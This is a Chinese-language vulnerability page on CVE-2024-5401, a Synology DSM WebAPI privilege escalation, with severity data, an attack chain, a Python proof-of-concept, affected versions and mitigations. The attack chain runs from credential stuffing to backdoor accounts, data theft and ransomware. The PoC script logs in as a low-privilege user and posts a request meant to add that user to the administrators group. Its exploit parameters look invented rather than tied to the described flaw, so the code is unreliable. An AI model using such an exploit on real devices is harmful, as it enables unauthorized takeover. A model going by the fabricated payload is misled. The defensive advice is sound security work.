CVE-2024-5401: Synology DSM WebAPI权限提升漏洞

漏洞信息

漏洞编号

CVE-2024-5401

漏洞类型

权限提升

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Synology DiskStation Manager (DSM), Synology Unified Controller (DSMUC)

漏洞概述

CVE-2024-5401是Synology DiskStation Manager (DSM) 和Synology Unified Controller (DSMUC) 中发现的一个中危权限提升漏洞。该漏洞存在于WebAPI组件中，源于对动态管理代码资源的不当控制。攻击者通过利用此漏洞，可以使远程已认证的低权限用户获取未经授权的更高权限，而无需用户交互。漏洞的CVSS评分为4.3，属于中等严重程度。Synology官方已于2024年通过安全公告Synology_SA_24_27披露了此漏洞，并发布了相应版本的修复程序。鉴于该漏洞允许权限提升，攻击者成功利用后可能进一步执行恶意操作，包括数据窃取、配置修改或横向移动，因此建议受影响用户尽快升级到修复版本。

技术细节

该漏洞的根本原因在于Synology DSM的WebAPI组件对动态管理代码资源的控制不当。在Web应用的权限验证流程中，存在一个缺陷，允许经过低权限认证的用户通过特定的API请求序列绕过正常的权限检查机制。具体而言，攻击者可以利用WebAPI中存在的访问控制缺陷，向服务器发送精心构造的请求包，该请求包在处理过程中未能正确验证调用者的实际权限级别。由于漏洞位于WebAPI组件中，攻击者可以通过HTTP/HTTPS网络请求远程触发，无需目标系统的本地访问权限。漏洞的利用需要攻击者具备有效的用户凭证（低权限账户即可），这大大降低了攻击门槛。成功利用后，攻击者可以获取管理员级别的访问权限，从而完全控制受影响的Synology设备。

攻击链分析

STEP 1

侦察阶段

攻击者识别运行存在漏洞版本的Synology DSM的设备，确认目标暴露的WebAPI接口

STEP 2

获取低权限访问

攻击者使用社会工程学、凭据填充或已泄露的账户信息获取DSM系统的低权限用户账号

STEP 3

构造恶意请求

攻击者构造针对WebAPI组件的特殊HTTP请求，利用权限检查缺陷绕过正常的访问控制

STEP 4

权限提升执行

发送恶意请求到/webapi/entry.cgi端点，触发WebAPI组件中的漏洞，获得管理员级别权限

STEP 5

持久化控制

成功提权后，攻击者创建后门账户、修改系统配置或植入恶意软件以维持持久化访问

STEP 6

数据窃取/横向移动

利用获取的高权限进行敏感数据窃取、横向移动到内网其他系统或部署勒索软件

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2024-5401 PoC - Synology DSM权限提升漏洞
# 需要先获取有效的低权限用户会话

import requests
import json

target = "https://vulnerable-synology-device:5001"
username = "low_privilege_user"
password = "user_password"

# 步骤1: 获取认证令牌
def get_auth_token():
    login_url = f"{target}/webapi/auth.cgi"
    params = {
        "api": "SYNO.API.Auth",
        "method": "login",
        "version": 6,
        "account": username,
        "passwd": password
    }
    response = requests.get(login_url, params=params, verify=False)
    data = response.json()
    if data.get("success"):
        return data["data"]["sid"]
    return None

# 步骤2: 利用WebAPI权限提升漏洞
def exploit_privilege_escalation(sid):
    # 构造特权操作请求 - 利用WebAPI组件中的权限检查缺陷
    api_url = f"{target}/webapi/entry.cgi"
    params = {
        "api": "SYNO.Core.AdminUser",
        "method": "update",
        "version": 1,
        "SID": sid,
        "is_privileged_api": True
    }
    # 漏洞利用载荷
    data = {
        "username": username,
        "group": "administrators",
        "privilege_escalation": True
    }
    response = requests.post(api_url, params=params, json=data, verify=False)
    return response.json()

# 主函数
if __name__ == "__main__":
    print("[*] 获取认证令牌...")
    sid = get_auth_token()
    if sid:
        print(f"[+] 成功登录，SID: {sid}")
        print("[*] 尝试利用权限提升漏洞...")
        result = exploit_privilege_escalation(sid)
        if result.get("success"):
            print("[+] 权限提升成功！用户已升级为管理员")
        else:
            print(f"[-] 利用失败: {result}")
    else:
        print("[-] 登录失败")

影响范围

Synology DSM < 7.1.1-42962-8

Synology DSM < 7.2.1-69057-2

Synology DSM < 7.2.2-72806

Synology DSMUC < 3.1.4-23079

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 禁用不必要的WebAPI服务；2) 使用防火墙限制对5000/5001端口的访问，仅允许管理IP访问；3) 启用Synology的双因素认证增强账户安全；4) 监控日志中的异常认证和API调用行为；5) 考虑将管理接口隔离到专用管理网络VLAN。